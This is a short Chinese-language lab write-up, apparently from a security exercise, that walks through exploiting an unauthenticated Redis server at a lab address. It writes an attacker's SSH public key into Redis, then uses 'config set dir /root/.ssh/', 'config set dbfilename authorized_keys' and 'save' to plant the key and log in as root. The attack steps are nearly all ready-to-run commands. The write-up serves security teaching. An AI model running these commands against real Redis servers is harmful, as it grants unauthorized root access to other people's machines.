【实验原理】
利用 Redis 自身的提供的 config
命令,可以进行写文件操作,恶意访问者可以成功将自己的公钥写入目标服务器的 /root/.ssh
文件夹的authotrized_keys
文件中,进而可以直接使用对应的私钥登录目标服务器。
步骤一:在本地生产公私钥文件
linux系统行使用命令ssh-keygen -t rsa生成本地公钥和私钥文件,输入密码口令;如下其显示成功生成公私钥文件
步骤二:将公钥写入临时文件中,(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt
注意需要在文件的头部和尾部多留几个空行,以便公钥始终可以保持在单独的一行而不会和其他数据混在一行中(刚开始没注意到,一直导致登录目标服务器不成功)
步骤三:连接redis运用config命令写入文件
cat /tmp/foo.txt | /usr/redis/redis-cli -h 172.16.12.2 -p 6379 -x set crackit 表示在主机172.16.12.2上的redis数据库中插入一条记录,对应的键名为crackit(键名可以是其他字符串,不一定需要写成crackit),键值为foo.txt中的内容;
4.redis 172.16.12.2 :6379> config set dir /root/.ssh/,用于将Redis数据库硬盘备份文件的存放目录修改为/root/.ssh/;
5.redis 172.16.12.2 :6379> config set dbfilename authorized_keys,用于将Redis数据硬盘库备份文件的名字修改为authorized_keys;
6.redis 172.16.12.2 :6379> save,将Redis数据库在内存中的数据保存到硬盘备份文件中,即转储到/root/.ssh/authorized_keys文件中;
输入私钥口令成功登录172.16.12.2服务器
————————————————